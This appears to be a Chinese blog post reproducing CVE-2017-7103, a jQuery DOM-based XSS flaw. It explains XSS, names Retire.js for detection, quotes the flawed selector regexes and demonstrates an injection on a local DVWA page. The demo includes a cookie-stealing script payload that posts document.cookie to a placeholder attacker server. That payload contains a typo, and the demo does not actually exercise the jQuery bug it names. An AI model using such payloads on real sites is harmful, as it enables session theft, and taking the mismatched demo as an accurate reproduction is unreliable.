首页 > 其他分享 >漏洞复现报告:CVE-2017-7103 JQuery框架XSS漏洞

漏洞复现报告:CVE-2017-7103 JQuery框架XSS漏洞

时间:2023-08-15 17:04:41浏览次数:47  
标签:JQuery jQuery XSS 漏洞 cookie 攻击者 CVE

1.简介

jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装 JavaScript 常用的功能代码,提供一种简便的 JavaScript 设计模式,优化 HTML 文档操作、事件处理、动画设计和 Ajax 交互。

据一项调查报告,在对 433000 个网站的分析中发现,77%的网站至少使用了一个具有已知安全漏洞的前端 JavaScript 库,而 jQuery 位列榜首,而且远远超过其他库。但事实上这些库有可用的不存在漏洞的最新版本,只是很少有开发人员会更新,一方面安全意识不够,另一方面更新需考虑兼容性问题。

XSS(cross site script) 跨站脚本。属于代码执行的一种,这里执行的是前端代码,一般是javascript代码。对于反射型的XSS,攻击代码是在Http的响应包中。攻击者通过构造含有攻击代码的URL,被攻击者点击后,攻击代码在客户端解释执行。可以通过此恶意代码向攻击者的服务器发送被攻击者的敏感信息,从而实现攻击目的。

在 JQuery 的诸多发行版本中,存在着 DOM-based XSS(跨站脚本攻击的一种) 漏洞,易被攻击者利用。漏洞原因在于过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 LOCATION.HASH 跨站漏洞。这也是最为被大众熟知的 jQuery 的一个漏洞。此外,1.12.0 之前的 jQuery UI 库也可以通过对话框函数的 closeText 参数进行 DOM-based XSS 攻击。

漏洞复现报告:CVE-2017-7103 JQuery框架XSS漏洞_jQuery

2.漏洞检测

直接使用火狐浏览器的插件:Retire.js,他可以对CVE-2017-7103、CVE-2015-9251、CVE-2014-6071、CVE-2012-6708、CVE-2011-4969 等XSS漏洞进行检测

漏洞复现报告:CVE-2017-7103 JQuery框架XSS漏洞_网络安全_02


3.漏洞成因

jQuery框架本身并不会导致XSS(跨站脚本攻击)漏洞,但它可以用于构建前端交互和动态内容,如果不正确使用或处理用户输入的数据,可能会导致XSS漏洞。

XSS漏洞是由于网站在处理用户输入时未对输入进行正确的过滤、转义或验证而产生的。攻击者可以通过在用户输入中注入恶意的脚本代码,当其他用户访问该页面时,恶意脚本会在其浏览器中执行,进而导致安全问题。

jQuery 中过滤用户输入数据所使用的正则表达式存在缺陷,导致location.hash跨站脚本攻击。


漏洞利用

jQuery 1.6.1版本

正则表达式如下

quickExpr = /^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,

jQuery1.7.2 版本

正则表达式如下

quickExpr = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,

jQuery1.7.2 版本

正则表达式如下:

quickExpr = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,

构造攻击url :<script>document.loaction='http://攻击者服务器ip地址/cookie.php?cookie='+document.cookie</script>

模拟被攻击者去访问一下:localhost:8081/dvwa/vulnerabilities/xss_r/?name=<script>document.loaction='http://攻击者服务器ip地址/cookie.php?cookie='+document.cookie</script>

成功截图

漏洞复现报告:CVE-2017-7103 JQuery框架XSS漏洞_网络安全_03

漏洞复现报告:CVE-2017-7103 JQuery框架XSS漏洞_网络安全_04


漏洞复现报告:CVE-2017-7103 JQuery框架XSS漏洞_网络安全_05






标签:JQuery,jQuery,XSS,漏洞,cookie,攻击者,CVE
From: https://blog.51cto.com/u_15854462/7090572

相关文章

  • XSS基础学习(3)
    XSS基础学习六、靶场实践(该靶场有bug,直接修改html代码,添加弹窗,就直接可以通关)第八关http://8.130.109.21:9995/level8.php?keyword=not%20bad!//输入点输入javascript:alert(`xss`)查看页面源码发现<ahref="javascr_ipt:alert(`xss`);">,此时试试其他编码是否绕过//pay......
  • WPS RCE漏洞 学习
    复现过程2023年HW出现WPS0dayPOC影响版本:WPSOffice2023个人版<11.1.0.15120WPSOffice2019企业版<11.8.2.12085简单操作,安装指定版本以下的wps版本设置host为127.0.0.1clientweb.docer.wps.cn.cloudwps.cn在poc目录下打开cmd,启动简单的http服务......
  • Apache Flink目录遍历漏洞复现CVE-2020-17519
    ApacheFlink目录遍历漏洞复现CVE-2020-17519前置知识ApacheFlink:ApacheFlink是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。Flink能在所有常见集群环境中运行,并能以内存速度和任意规模进行计算。漏洞利用条件:ApacheFlink版本为1.11.0......
  • 修复漏洞-gitlab升级(2)
    修复漏洞-gitlab升级(2)接上一篇。。。升级完我就做了个快照,等领导有空试用下,然后我不忘提醒,升级十几个版本需要花费2天时间,而且升级过程中有些报错,不知道会不会影响使用。领导说直接装新版本,免得夜长梦多(一下子推翻我所有的努力)当时我领导想买一台按量付费的服务器B......
  • CSRF漏洞挖掘
    csrf漏洞出现的原因:网站接口被第三方网站调用时cookie被直接利用了如何确定一个网站是否具有csrf漏洞第三方网站调用敏感接口成功,则具有漏洞。如何操作BP可以对某些接口进行cdrf漏洞检测 可以生成一个html文件->poc,在浏览器中访问就可以确定是否包含CSRFTester也可以生......
  • 修复漏洞-gitlab升级(1)
    修复漏洞-gitlab升级(1)这东西搞了我很久。。。今天终于告一段落了,可喜可贺(现在喉咙痛想生病的样子)上一篇提到我们的gitlab版本存在漏洞:任意文件读取漏洞(CVE-2020-10977),大家有兴趣可以查下这个安全漏洞的重现  (虽然是测试域名被测到,但真实环境就是这个版本)。而领导最......
  • XSS基础学习(2)
    XSS基础学习(2)六、靶场实践第一关http://8.130.109.21:9995/level1.php?name=test//通过页面发现输入点,name=test,test是输入点,先输入<,查看页面源码,此时<未被转义,构建以下payload。通关//payloadhttp://8.130.109.21:9995/level1.php?name=<script>alert(1);</script>第二......
  • 漏洞复现报告:CVE-2020-2551 IIOP反序列化漏洞
    1.漏洞描述: 2020年1月15日,Oracle发布了一系列的安全补丁,其中OracleWebLogicServer产品有高危漏洞,漏洞编号CVE-2020-2551,CVSS评分9.8分,漏洞利用难度低,可基于IIOP协议执行远程代码。Weblogic是一个服务器,可以做web服务器也可以做应用服务器WebLogic是美国Oracle公司出品的......
  • JQuery&Ajax基础知识
    JQuery&Ajax基础知识1、Jquery简介Query是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由JohnResig发布。jQuery设计的宗旨是“writeLess,DoMore”,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一......
  • Nexpose v6.6.210 for Linux & Windows - 漏洞扫描
    Nexposev6.6.210forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,ReleaseAug09,2023请访问原文链接:https://sysin.org/blog/nexpose-6/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org您的本地漏洞扫描程序搜集通过实时覆盖整个网络,随......